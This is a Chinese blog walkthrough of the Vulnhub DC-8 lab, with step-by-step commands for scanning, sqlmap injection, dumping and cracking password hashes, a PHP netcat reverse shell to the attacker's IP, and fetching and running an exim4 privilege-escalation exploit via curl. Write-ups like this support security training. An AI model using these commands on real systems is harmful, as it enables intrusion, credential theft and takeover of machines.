Vulnhub靶场 DC-8

一、环境搭建

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-8.zip

虚拟机:VM虚拟机 或者VBOX 导入即可 

网络环境:NAT

介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。

二、信息收集

1、主机发现

nmap -sP 192.168.176.0/24 

查看服务

nmap -A -p- -v 192.168.176.143

进入网站192.168.176.143

2、指纹识别

 whatweb http://192.168.176.143

三、漏洞复现

1、SQL注入  sqlmap工具

查看网站功能点,发现一处sql交互 存在sql注入漏洞 使用‘等字符,可以判断

sqlmap -u http://192.168.176.143/?nid=1 -dbs  

1.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -tables --batch
2.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -T users -colunms
3.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -T users -C name,pass -dump

admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z john   $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
​​​​​

获取到admin和john密码加密后的密文 然后新建一个pass.txt 把密文放进去使用john 进行破解 密码:turtle

2、dirsearch目录探测

dirsearch -u http://192.168.176.143/ -e php  -x 400,404,503,403 

常用参数如下
-h                查看帮助
-u   xx         目标域名xx
-e   php       扫描网站的类型为php,   类型如php,asp,jsp
-t    40         线程为40,默认为30
-x    400, 404, 503    排除响应码400...,即响应码为这个的不输出到屏幕上
--full-url      输出完成的url模式,这样直接点击就能访问扫描出的结果

http://192.168.176.143/user/login/ 后台地址  登录上面获取到的账号密码

3、反弹shell

发现Content->点击edit->点击WEBFORMS->点击Form settings->点击下拉框选择PHP code

输入反弹shell payload

<?php system ("nc -e /bin/bash 192.168.176.134 7777");?>

代码写入保存后,kali监听7777端口,在Contact Us页面随便输入信息点击Submit后,查看kali已得到shell

使用交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

4、提权 exim4

接下来提权  使用find命令,查找具有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

找到一个exim4 查看一下版本信息

/usr/sbin/exim4 --version

使用searchsploit命令搜索exim相关漏洞

46996.sh拷贝到本地并改名为exp.sh,上传到靶机 执行

kali开启http服务 service apache2 start

将脚本格式设置成符合unix格式 不然会提权失败

cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh

vim exp.sh

set ff=unix

cp exp.sh  /var/www/html

靶机进入tmp目录,wgent\curl下载脚本执行,其他目录 没有权限

weget http://192.168.176.134/exp.sh  命令失败

curl 192.168.176.134/exp.sh -o exp6.sh 读取并重新保存为exp6.sh

chmod 777 / X  给执行权限 

执行文件

./exp6.sh -m netcat

5、获取flag

四、总结

  1. sqlmap进行SQL注入
  2. 常用安全工具的熟悉
  3. exim4命令提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值